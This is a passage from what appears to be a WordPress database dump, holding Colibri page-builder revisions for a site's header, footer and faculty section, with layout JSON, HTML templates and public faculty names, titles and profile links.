header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"type\":\"header\",\"id\":\"25-h24\",\"partialId\":25,\"styleRef\":57}],\"id\":\"25-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":25,\"styleRef\":34}','','','inherit','closed','closed','','26-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',26,'https://gsudice.dataconn.net/?p=1639',0,'revision','',0),(1640,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','<div data-colibri-id=\"25-h1\" class=\"page-header style-34 style-local-25-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"true\" role=\"banner\" class=\"h-navigation_outer h-navigation_overlap style-35-outer style-local-25-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"25-h2\" class=\"h-section h-navigation h-navigation d-flex style-35 style-local-25-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"25-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-36 style-local-25-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-37-outer style-local-25-h4-outer\">\n                <div data-colibri-id=\"25-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-37 style-local-25-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h5\" class=\"d-flex align-items-center text-lg-left text-md-left text-left justify-content-lg-start justify-content-md-start justify-content-start style-38 style-local-25-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-38-text style-local-25-h5-text\">[colibri_site_title]</span></a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-39-outer style-local-25-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"25-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-39 style-local-25-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"25-h7\" class=\"style-40 style-local-25-h7 position-relative h-element\">\n                      <!---->\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-41-outer style-local-25-h8-outer\">\n                <div data-colibri-id=\"25-h8\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-41 style-local-25-h8 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h9\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-tablet h-menu-horizontal h-dropdown-menu style-42 style-local-25-h9 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"bordered-active-item bordered-active-item--bottom effect-borders-grow grow-from-center\" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"25-h10\" class=\"h-mobile-menu h-global-transition-disable style-43 style-local-25-h10 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-25-h10\" data-target-id=\"offcanvas-wrapper-25-h10\" data-offcanvas-overlay-id=\"offcanvas-overlay-25-h10\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-25-h10\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-43-offscreen style-local-25-h10-offscreen\">\n                          <div data-colibri-id=\"25-h11\" class=\"d-flex flex-column h-offscreen-panel style-44 style-local-25-h11 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-45 style-local-25-h13 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-46-outer style-local-25-h14-outer\">\n                                    <div data-colibri-id=\"25-h14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-46 style-local-25-h14 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"25-h15\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-47 style-local-25-h15 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\"><span class=\"h-logo__text h-logo__text_h logo-text d-inline-block style-47-text style-local-25-h15-text\">[colibri_site_title]</span></a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"25-h12\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-50 style-local-25-h12 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"25-h16\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-48 style-local-25-h16 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-lg-6 h-col-md-6 h-col-12 style-49-outer style-local-25-h17-outer\">\n                                    <div data-colibri-id=\"25-h17\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-49 style-local-25-h17 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                                        <!---->\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-25-h10\" class=\"offscreen-overlay style-43-offscreenOverlay style-local-25-h10-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"25-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-57 style-local-25-h24 position-relative\">\n    <!---->\n    <!---->\n    <div style=\"height: 70px; bottom: calc(0px);\" class=\"h-separator\">\n      <svg style=\"fill:#f6f8fa;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1000 100\" preserveAspectRatio=\"none\">\n        <g opacity=\"0.33\">\n          <path d=\"M385.42,52.92c-11.63,4.22-23.18,9-34.52,14.38-103.18,49-91.83-33.55-148.36-.49,50.13,17.35,121.87,64.84,270.46.49,11-4.7,64.52-25.43,118-41.8-4-.52-8.45-.95-13.41-1.28C507.83,41.64,455.4,71.84,385.42,52.92Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M0,59.7S48.08,103,116.06,83.43C54.25,76.6,0,39.8,0,39.8Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n          <path d=\"M916.4,48.1c-55.76,5.45-76.83,2-111.28-7.81-3.09,1.4-6.07,2.81-9,4.22,13.93,8.57,25.54,16.74,33.15,22.39,13,9.8,43,25.4,75.8,22.1S1000,59.7,1000,59.7V36.5s-6.87-4.5-21.48-9.06C966,36.56,946.56,45.15,916.4,48.1Z\" transform=\"translate(0 0)\" style=\"isolation:isolate\"></path>\n        </g>\n        <g opacity=\"0.66\">\n          <path d=\"M771.65,30.49,766.1,28.9c-55-15.81-99.84-18-138.66-13.76a368.79,368.79,0,0,0-49.81,9.08c5,.33,9.44.76,13.41,1.28a89.13,89.13,0,0,1,13.86,2.7C656.8,44.1,688.5,67.3,734,67.3c19.82,0,38-11.12,62.15-22.79,2.9-1.41,5.88-2.82,9-4.22C795.39,37.52,784.59,34.23,771.65,30.49Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M371,48.4C242,1.8,242,5.4,184.8,20.6,128,35.8,132.3,44.9,89.9,52.5,28.6,63.7,0,0,0,0V39.8S54.25,76.6,116.06,83.43c28.46,3.15,58.53-.05,85.64-16.13l.84-.49c56.53-33.06,45.18,49.44,148.36.49,11.34-5.38,22.89-10.16,34.52-14.38Q378.34,51,371,48.4Z\"\n            transform=\"translate(0 0)\"></path>\n          <path d=\"M978.52,27.44C993.13,32,1000,36.5,1000,36.5V0S996.54,14.27,978.52,27.44Z\" transform=\"translate(0 0)\"></path>\n        </g>\n        <path d=\"M0,0S28.6,63.7,89.9,52.5c42.4-7.6,38.1-16.7,94.9-31.9C242,5.4,242,1.8,371,48.4q7.33,2.61,14.42,4.52c70,18.92,122.41-11.28,192.21-28.7a368.79,368.79,0,0,1,49.81-9.08c38.82-4.21,83.68-2.05,138.66,13.76l5.55,1.59c12.94,3.74,23.74,7,33.47,9.8,34.45,9.83,55.52,13.26,111.28,7.81,30.16-3,49.63-11.54,62.12-20.66C996.54,14.27,1000,0,1000,0Z\"\n          transform=\"translate(0 0)\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"25-h25\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-58 style-local-25-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-59-outer style-local-25-h26-outer\">\n            <div data-colibri-id=\"25-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-59 style-local-25-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"25-h27\" class=\"page-title style-60 style-local-25-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-page-title__outer style-60-outer style-local-25-h27-outer\">\n                    <div class=\"h-global-transition-all\">[colibri_page_title tag=\"h1\"]</div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <!---->\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_post','','inherit','closed','closed','','25-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',25,'https://gsudice.dataconn.net/?p=1640',0,'revision','',0),(1641,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','{\"name\":\"hop-footer\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Footers\",\"attrs\":{\"id\":\"Footers\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-copyright\",\"slot\":null,\"parentId\":\"28-f4\",\"index\":0,\"id\":\"28-f5\",\"partialId\":28,\"styleRef\":270,\"type\":\"footer\"}],\"id\":\"28-f4\",\"parentId\":\"28-f3\",\"partialId\":28,\"styleRef\":269,\"type\":\"footer\"}],\"parentId\":\"28-f2\",\"index\":0,\"id\":\"28-f3\",\"partialId\":28,\"styleRef\":268,\"type\":\"footer\"}],\"id\":\"28-f2\",\"parentId\":\"28-f1\",\"partialId\":28,\"styleRef\":267,\"type\":\"footer\"}],\"id\":\"28-f1\",\"ui\":{\"isSelected\":false,\"isHovered\":false},\"type\":\"footer\",\"partialId\":28,\"styleRef\":266}','','','inherit','closed','closed','','29-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',29,'https://gsudice.dataconn.net/?p=1641',0,'revision','',0),(1642,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','<div data-enabled=\"true\" data-colibri-component=\"footer-parallax\" data-colibri-id=\"28-f1\" class=\"page-footer style-266 style-local-28-f1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"28-f2\" id=\"Footers\" class=\"h-section h-section-global-spacing d-flex align-items-lg-end align-items-md-end align-items-end style-267 style-local-28-f2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"28-f3\" class=\"h-row-container gutters-row-lg-1 gutters-row-md-1 gutters-row-2 gutters-row-v-lg-1 gutters-row-v-md-1 gutters-row-v-2 style-268 style-local-28-f3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-1 gutters-col-md-1 gutters-col-2 gutters-col-v-lg-1 gutters-col-v-md-1 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-269-outer style-local-28-f4-outer\">\n            <div data-colibri-id=\"28-f4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-1 h-px-md-1 h-px-2 v-inner-lg-1 v-inner-md-1 v-inner-2 style-269 style-local-28-f4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"28-f5\" class=\"style-270 style-local-28-f5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-global-transition-all\">[colibri_copyright]© {year} {site-name}. Created for free using WordPress and\n                    <a target=\"_blank\" href=\"https://colibriwp.com\" rel=\"noopener\">Colibri</a>[/colibri_copyright]</div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','footer_post','','inherit','closed','closed','','28-revision-v1','','','2023-10-12 15:14:37','2023-10-12 19:14:37','',28,'https://gsudice.dataconn.net/?p=1642',0,'revision','',0),(1649,1,'2023-10-12 15:30:01','2023-10-12 19:30:01','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-cropped-headshot-1-e1651208089645-1-e1697138345727.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1646,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1648,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 